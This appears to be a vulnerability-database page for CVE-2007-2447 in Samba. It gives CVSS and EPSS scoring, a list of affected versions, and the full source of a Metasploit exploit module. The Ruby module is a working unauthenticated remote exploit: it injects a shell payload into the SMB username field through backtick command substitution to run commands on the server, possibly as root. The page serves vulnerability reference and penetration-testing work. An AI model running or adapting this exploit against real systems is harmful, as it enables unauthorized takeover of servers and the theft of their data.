Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
6 |
|
AV:N/AC:M/Au:S/C:P/I:P/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 16320
Publication date : 2010-08-17 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# $Id: usermap_script.rb 10040 2010-08-18 17:24:46Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SMB
# For our customized version of session_setup_ntlmv1
CONST = Rex::Proto::SMB::Constants
CRYPT = Rex::Proto::SMB::Crypt
def initialize(info = {})
super(update_info(info,
'Name' => 'Samba "username map script" Command Execution',
'Description' => %q{
This module exploits a command execution vulerability in Samba
versions 3.0.20 through 3.0.25rc3 when using the non-default
"username map script" configuration option. By specifying a username
containing shell meta characters, attackers can execute arbitrary
commands.
No authentication is needed to exploit this vulnerability since
this option is used to map usernames prior to authentication!
},
'Author' => [ 'jduck' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10040 $',
'References' =>
[
[ 'CVE', '2007-2447' ],
[ 'OSVDB', '34700' ],
[ 'BID', '23972' ],
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534' ],
[ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ]
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => true, # root or nobody user
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
# *_perl and *_ruby work if they are installed
# mileage may vary from system to system..
}
},
'Targets' =>
[
[ "Automatic", { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 14 2007'))
register_options(
[
Opt::RPORT(139)
], self.class)
end
def exploit
connect
# lol?
username = "/=`nohup " + payload.encoded + "`"
begin
simple.client.negotiate(false)
simple.client.session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'], false)
rescue ::Timeout::Error, XCEPT::LoginError
# nothing, it either worked or it didn't ;)
end
handler
end
end
Products Mentioned
Configuraton 0
Samba>>Samba >> Version 3.0.0
Samba>>Samba >> Version 3.0.1
Samba>>Samba >> Version 3.0.2
Samba>>Samba >> Version 3.0.2a
Samba>>Samba >> Version 3.0.3
Samba>>Samba >> Version 3.0.4
Samba>>Samba >> Version 3.0.4
Samba>>Samba >> Version 3.0.5
Samba>>Samba >> Version 3.0.6
Samba>>Samba >> Version 3.0.7
Samba>>Samba >> Version 3.0.8
Samba>>Samba >> Version 3.0.9
Samba>>Samba >> Version 3.0.10
Samba>>Samba >> Version 3.0.11
Samba>>Samba >> Version 3.0.12
Samba>>Samba >> Version 3.0.13
Samba>>Samba >> Version 3.0.14
Samba>>Samba >> Version 3.0.14a
Samba>>Samba >> Version 3.0.15
Samba>>Samba >> Version 3.0.16
Samba>>Samba >> Version 3.0.17
Samba>>Samba >> Version 3.0.18
Samba>>Samba >> Version 3.0.19
Samba>>Samba >> Version 3.0.20
Samba>>Samba >> Version 3.0.20a
Samba>>Samba >> Version 3.0.20b
Samba>>Samba >> Version 3.0.21
Samba>>Samba >> Version 3.0.21a
Samba>>Samba >> Version 3.0.21b
Samba>>Samba >> Version 3.0.21c
Samba>>Samba >> Version 3.0.22
Samba>>Samba >> Version 3.0.23
Samba>>Samba >> Version 3.0.23a
Samba>>Samba >> Version 3.0.23b
Samba>>Samba >> Version 3.0.23c
Samba>>Samba >> Version 3.0.23d
Samba>>Samba >> Version 3.0.24
Samba>>Samba >> Version 3.0.25
Samba>>Samba >> Version 3.0.25
Samba>>Samba >> Version 3.0.25
Samba>>Samba >> Version 3.0.25
Samba>>Samba >> Version 3.0.25
References